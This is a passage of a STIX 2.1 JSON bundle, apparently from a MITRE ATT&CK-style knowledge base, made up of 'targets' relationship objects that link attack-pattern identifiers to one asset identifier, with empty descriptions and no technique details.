"2024-07-01T10:37:15.826424", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826427", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d2139fcd-01ae-40e0-9edc-8eea978cb395", "created": "2024-07-01T10:37:15.826434", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826436", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2ef55847-4e93-413d-a9f4-f1b0687856a1", "created": "2024-07-01T10:37:15.826444", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826446", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--495d780f-8438-46c5-a82e-fbee080bef94", "created": "2024-07-01T10:37:15.826454", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826456", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3807506e-d1ba-49ef-879a-7dbc42a56233", "created": "2024-07-01T10:37:15.826464", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826466", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ba1ec538-44d1-46bc-9567-40fce4e38a4f", "created": "2024-07-01T10:37:15.826474", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826476", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--99dff549-407c-4ad8-82cb-146d91665f38", "created": "2024-07-01T10:37:15.826484", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826486", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2538a506-8ca9-4b52-b473-298ec2c0b3b0", "created": "2024-07-01T10:37:15.826494", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826497", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3dff8bf3-21f9-440a-bef5-9d4955574551", "created": "2024-07-01T10:37:15.826504", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826506", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ee59c61a-e1a7-4773-b39d-b291c1f0432d", "created": "2024-07-01T10:37:15.826514", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826517", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ccb0ebdb-b925-431d-9a84-bf23ba4bf56e", "created": "2024-07-01T10:37:15.826524", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826526", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8b0637de-ba45-49a3-b727-7f499bd3c0e3", "created": "2024-07-01T10:37:15.826534", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826536", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--45f1d387-d37e-408c-a1b0-5db0ae92947e", "created": "2024-07-01T10:37:15.826544", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826547", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2ec9b07a-07bd-4afd-8b04-9be0bb744d94", "created": "2024-07-01T10:37:15.826554", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826557", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5db4adfa-b003-48de-9713-f261aed1ca00", "created": "2024-07-01T10:37:15.826565", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826567", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--32ebce5d-035a-49cf-97ad-9572b272d860", "created": "2024-07-01T10:37:15.826575", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826577", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eb40f583-cbce-4213-9fa1-ad74ca1b5836", "created": "2024-07-01T10:37:15.826585", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826587", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--29280313-c44b-4cb6-a6bf-0506ca990d78", "created": "2024-07-01T10:37:15.826595", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826597", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9df3b1f6-ca6f-4bca-b707-2aafa579f0a0", "created": "2024-07-01T10:37:15.826605", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826607", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--40d433cd-c5d8-4698-a580-1fb00b0a6ebd", "created": "2024-07-01T10:37:15.826615", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826617", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b187c146-afca-4838-a509-7fba973b2ddb", "created": "2024-07-01T10:37:15.826625", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826627", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--84a1b34b-28b0-41b0-b9bf-3021b75db9f8", "created": "2024-07-01T10:37:15.826635", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826637", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--61593f71-7921-4a13-8876-3da05ffefa81", "created": "2024-07-01T10:37:15.826645", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826647", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c51e96fb-83bc-4c5e-814c-4cf322a71f36", "created": "2024-07-01T10:37:15.826655", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826657", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8ea7ef85-21ef-4f9d-a58e-4b9a04bfe681", "created": "2024-07-01T10:37:15.826666", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826668", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4a5dc83c-1716-4996-aa2f-de992594df6a", "created": "2024-07-01T10:37:15.826676", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826678", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cf85d87f-7de2-42b0-9fbf-0eca5b51855d", "created": "2024-07-01T10:37:15.826686", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826688", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--044621a7-64b8-417b-a2a8-5d277a1e5057", "created": "2024-07-01T10:37:15.826696", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826698", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--007f8c59-98c8-4787-876b-0716b6af58cc", "created": "2024-07-01T10:37:15.826707", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826709", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eed74426-8d72-4f7d-bb00-fb374dd3c144", "created": "2024-07-01T10:37:15.826717", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826719", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9fd44cae-4409-48af-bbba-a7d0f19cc9b2", "created": "2024-07-01T10:37:15.826727", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826729", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5821fdb2-d6e8-4780-a505-8d02b5a25c36", "created": "2024-07-01T10:37:15.826737", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826739", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1bcbb34a-5ca7-4669-a72e-c3d930dabc0a", "created": "2024-07-01T10:37:15.826747", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826749", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--df56b62c-9b3c-42fb-84ab-44a4f74c2f8b", "created": "2024-07-01T10:37:15.826757", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826759", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a7128305-5471-4ac5-90ca-57182888648c", "created": "2024-07-01T10:37:15.826767", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826769", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aed51e58-be47-4e7d-b73d-90dec76d2c65", "created": "2024-07-01T10:37:15.826777", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826779", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cd8df4d1-c0db-42b2-9185-20bbba87256d", "created": "2024-07-01T10:37:15.826787", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826789", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ec3e5b29-333e-4df8-8d28-9b409f71292a", "created": "2024-07-01T10:37:15.826797", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826799", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f79642c2-162f-4b20-9232-1a9b139c0951", "created": "2024-07-01T10:37:15.826807", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826809", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--21b0fab3-3e39-40be-882c-84d288da779d", "created": "2024-07-01T10:37:15.826817", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826819", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--21bdc5bc-741f-4e7f-9f8b-9aba878f2084", "created": "2024-07-01T10:37:15.826827", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.826829", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f25c7c8c-29c2-46c1-b324-b93372c5d298", "created": "2024-07-01T10:37:15.826837", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": 